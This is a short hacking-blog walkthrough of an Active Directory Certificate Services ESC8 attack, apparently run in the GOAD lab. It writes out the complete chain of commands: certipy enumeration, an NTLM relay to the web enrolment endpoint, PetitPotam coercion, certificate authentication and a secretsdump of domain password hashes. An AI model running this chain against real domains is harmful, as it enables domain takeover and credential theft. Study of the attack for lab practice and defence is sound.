root💀n16hth4wk-sec:~#

Recon → Enumerate → Exploit → Repeat!. 💀

View on GitHub

Description

Active Directory Certificate Services (ADCS) is Microsoft’s Public Key Infrastructure (PKI). It runs as a Windows Server role (a “Certification Authority”, or CA) and its job is to issue digital certificates the digital ID cards of the network. We will look on how to exploit misconfiguration in ADCS to escalate privileges on domain networks.

Steps to exploit

command

┌──(certipy_venv)─(n16hth4wk㉿n16hth4wk-sec)-[~/Documents/GOAD/certipy_venv/bin]                                     
└─$ python certipy find -u jon.snow -p iknownothing -dc-ip 192.168.56.11 -stdout

image

We can see vulnerability ESC8 and we can see the web enrolment is enabled over http.

image

command

┌──(n16hth4wk㉿n16hth4wk-sec)-[~/Documents/GOAD]
└─$ ~/.local/bin/ntlmrelayx.py -t http://192.168.56.10/certsrv/certfnsh.asp --adcs --template "DomainControllerAuthentication" -smb2support

command

python PetitPotam.py -d north.sevenkingdoms.local/ -u 'jon.snow' -p 'iknownothing' $AttackerIP(192.168.56.1)  $target(192.168.56.11)

image

image

We got success hit, we own a DC certificate.

command

┌──(certipy_venv)─(n16hth4wk㉿n16hth4wk-sec)-[~/Documents/GOAD/certipy_venv/bin]
└─$ python certipy auth -pfx ../../WINTERFELL.pfx -dc-ip 192.168.56.11

image

We got the DC machine account nt hash. Now the juicy part getting domain admin.

┌──(n16hth4wk㉿n16hth4wk-sec)-[~/Documents/GOAD]                                                                                       
└─$ secretsdump.py -hashes :76117ec144a9083557f93d3d81896c7d 'north.sevenkingdoms. local/winterfell$@192.168.56.11'                     
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies            
                                                                                                                                       
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied    
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)                                                                          
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4:::                
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f1c487c83f8fe1a98410dd22645557fc:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::              
arya.stark:1110:aad3b435b51404eeaad3b435b51404ee:4f622f4cd4284a887228940e2ff4e709:::
eddard.stark:1111:aad3b435b51404eeaad3b435b51404ee:d977b98c6c9282c5c478be1d97b237b8:::
catelyn.stark:1112:aad3b435b51404eeaad3b435b51404ee:cba36eccfd9d949c73bc73715364aff5:::         
robb.stark:1113:aad3b435b51404eeaad3b435b51404ee:831486ac7f26860c9e2f51ac91e1a07a:::
sansa.stark:1114:aad3b435b51404eeaad3b435b51404ee:b777555c2e2e3716e075cc255b26c14d:::
brandon.stark:1115:aad3b435b51404eeaad3b435b51404ee:84bbaa1c58b7f69d2192560a3f932129:::
[SNIP]

image